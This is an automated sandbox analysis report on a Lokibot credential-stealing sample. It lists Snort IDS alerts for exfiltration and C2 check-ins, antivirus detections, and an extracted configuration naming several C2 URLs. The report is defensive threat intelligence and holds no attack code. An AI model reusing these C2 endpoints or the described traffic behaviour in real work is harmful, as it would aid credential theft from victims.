              SID:2014169
              Source Port:58116
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380498322025483 06/23/22-18:09:28.697078
              SID:2025483
              Source Port:80
              Destination Port:49832
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802024312 06/23/22-18:08:26.365310
              SID:2024312
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802024318 06/23/22-18:09:30.995615
              SID:2024318
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802024313 06/23/22-18:09:06.486197
              SID:2024313
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498382025483 06/23/22-18:09:31.916398
              SID:2025483
              Source Port:80
              Destination Port:49838
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864996532014169 06/23/22-18:09:06.418101
              SID:2014169
              Source Port:64996
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249750802021641 06/23/22-18:08:40.626646
              SID:2021641
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249773802024318 06/23/22-18:08:56.128163
              SID:2024318
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802024313 06/23/22-18:09:47.624966
              SID:2024313
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802024313 06/23/22-18:09:30.995615
              SID:2024313
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802025381 06/23/22-18:08:32.826506
              SID:2025381
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249787802025381 06/23/22-18:09:17.520239
              SID:2025381
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.862724532014169 06/23/22-18:09:19.486245
              SID:2014169
              Source Port:62724
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249773802024313 06/23/22-18:08:56.128163
              SID:2024313
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802024313 06/23/22-18:09:22.064496
              SID:2024313
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802024318 06/23/22-18:09:47.624966
              SID:2024318
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802825766 06/23/22-18:10:05.859589
              SID:2825766
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249776802024313 06/23/22-18:09:02.062353
              SID:2024313
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802825766 06/23/22-18:08:53.475797
              SID:2825766
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497722025483 06/23/22-18:08:54.444254
              SID:2025483
              Source Port:80
              Destination Port:49772
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802021641 06/23/22-18:09:41.932837
              SID:2021641
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802024318 06/23/22-18:09:22.064496
              SID:2024318
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802024317 06/23/22-18:08:26.365310
              SID:2024317
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249896802021641 06/23/22-18:10:16.412962
              SID:2021641
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802825766 06/23/22-18:08:28.518392
              SID:2825766
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802825766 06/23/22-18:09:36.768062
              SID:2825766
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802021641 06/23/22-18:08:30.578499
              SID:2021641
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802025381 06/23/22-18:10:03.646769
              SID:2025381
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249783802021641 06/23/22-18:09:13.286095
              SID:2021641
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802024318 06/23/22-18:08:50.748195
              SID:2024318
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864816532014169 06/23/22-18:09:04.295727
              SID:2014169
              Source Port:64816
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249832802025381 06/23/22-18:09:27.755282
              SID:2025381
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802024313 06/23/22-18:08:50.748195
              SID:2024313
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802025381 06/23/22-18:08:45.504366
              SID:2025381
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802025381 06/23/22-18:09:20.096905
              SID:2025381
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802021641 06/23/22-18:09:55.746969
              SID:2021641
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802024318 06/23/22-18:08:48.152005
              SID:2024318
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497832025483 06/23/22-18:09:14.166477
              SID:2025483
              Source Port:80
              Destination Port:49783
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497762025483 06/23/22-18:09:02.967256
              SID:2025483
              Source Port:80
              Destination Port:49776
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.850152532014169 06/23/22-18:09:17.432912
              SID:2014169
              Source Port:50152
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249776802024318 06/23/22-18:09:02.062353
              SID:2024318
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497872025483 06/23/22-18:09:18.447312
              SID:2025483
              Source Port:80
              Destination Port:49787
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249777802825766 06/23/22-18:09:04.362566
              SID:2825766
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802825766 06/23/22-18:08:26.365310
              SID:2825766
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802825766 06/23/22-18:08:34.891799
              SID:2825766
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802825766 06/23/22-18:09:30.995615
              SID:2825766
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498582025483 06/23/22-18:09:56.667986
              SID:2025483
              Source Port:80
              Destination Port:49858
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802025381 06/23/22-18:10:09.603862
              SID:2025381
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802021641 06/23/22-18:09:11.023804
              SID:2021641
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498922025483 06/23/22-18:10:10.533295
              SID:2025483
              Source Port:80
              Destination Port:49892
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802825766 06/23/22-18:09:41.932837
              SID:2825766
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802825766 06/23/22-18:09:27.755282
              SID:2825766
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802025381 06/23/22-18:09:59.728406
              SID:2025381
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.857723532014169 06/23/22-18:08:28.453791
              SID:2014169
              Source Port:57723
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249776802025381 06/23/22-18:09:02.062353
              SID:2025381
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498562025483 06/23/22-18:09:48.532794
              SID:2025483
              Source Port:80
              Destination Port:49856
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.849327532014169 06/23/22-18:08:45.421000
              SID:2014169
              Source Port:49327
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249777802021641 06/23/22-18:09:04.362566
              SID:2021641
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.855269532014169 06/23/22-18:10:05.798868
              SID:2014169
              Source Port:55269
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249751802024313 06/23/22-18:08:43.382677
              SID:2024313
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802021641 06/23/22-18:09:08.917855
              SID:2021641
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249751802024318 06/23/22-18:08:43.382677
              SID:2024318
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.852096532014169 06/23/22-18:09:08.858532
              SID:2014169
              Source Port:52096
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249775802025381 06/23/22-18:08:59.805159
              SID:2025381
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498502025483 06/23/22-18:09:42.794326
              SID:2025483
              Source Port:80
              Destination Port:49850
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802825766 06/23/22-18:10:09.603862
              SID:2825766
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802021641 06/23/22-18:09:27.755282
              SID:2021641
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802021641 06/23/22-18:10:03.646769
              SID:2021641
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802021641 06/23/22-18:08:26.365310
              SID:2021641
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802825766 06/23/22-18:09:08.917855
              SID:2825766
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802021641 06/23/22-18:09:06.486197
              SID:2021641
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802024313 06/23/22-18:10:05.859589
              SID:2024313
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802021641 06/23/22-18:09:30.995615
              SID:2021641
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802024318 06/23/22-18:10:05.859589
              SID:2024318
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802021641 06/23/22-18:08:34.891799
              SID:2021641
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802825766 06/23/22-18:09:06.486197
              SID:2825766
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249750802025381 06/23/22-18:08:40.626646
              SID:2025381
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802021641 06/23/22-18:09:22.064496
              SID:2021641
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.849775532014169 06/23/22-18:10:14.553567
              SID:2014169
              Source Port:49775
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249787802825766 06/23/22-18:09:17.520239
              SID:2825766
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802025381 06/23/22-18:08:28.518392
              SID:2025381
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802024313 06/23/22-18:09:41.932837
              SID:2024313
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802024318 06/23/22-18:09:41.932837
              SID:2024318
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802825766 06/23/22-18:10:03.646769
              SID:2825766
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802025381 06/23/22-18:09:36.768062
              SID:2025381
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802024313 06/23/22-18:08:30.578499
              SID:2024313
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249783802024313 06/23/22-18:09:13.286095
              SID:2024313
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802825766 06/23/22-18:08:48.152005
              SID:2825766
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249896802025381 06/23/22-18:10:16.412962
              SID:2025381
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249783802024318 06/23/22-18:09:13.286095
              SID:2024318
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249777802024318 06/23/22-18:09:04.362566
              SID:2024318
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498422025483 06/23/22-18:09:37.680341
              SID:2025483
              Source Port:80
              Destination Port:49842
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249895802021641 06/23/22-18:10:14.615169
              SID:2021641
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249895802825766 06/23/22-18:10:14.615169
              SID:2825766
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802025381 06/23/22-18:08:53.475797
              SID:2025381
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802021641 06/23/22-18:08:50.748195
              SID:2021641
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802825766 06/23/22-18:08:50.748195
              SID:2825766
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802825766 06/23/22-18:09:22.064496
              SID:2825766
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802021641 06/23/22-18:08:32.826506
              SID:2021641
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249787802021641 06/23/22-18:09:17.520239
              SID:2021641
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://sempersim.su/gh20/fre.phpAvira URL Cloud: Label: malware
              Source: sempersim.suVirustotal: Detection: 26%Perma Link
              Source: http://sempersim.su/gh20/fre.phpVirustotal: Detection: 22%Perma Link
              Source: hfyhigXccT.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gh20/fre.php"]}
              Source: hfyhigXccT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: hfyhigXccT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:55923 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49743 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57723 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49744 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49744 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58116 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49745
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57421 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49746
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49873 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49749
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53802 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49750
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65266 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49751
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49327 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49754
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64452 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49765 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49765
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58625 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49771 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49771 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49771
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52810 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49772 -> 104.155.55.2:80
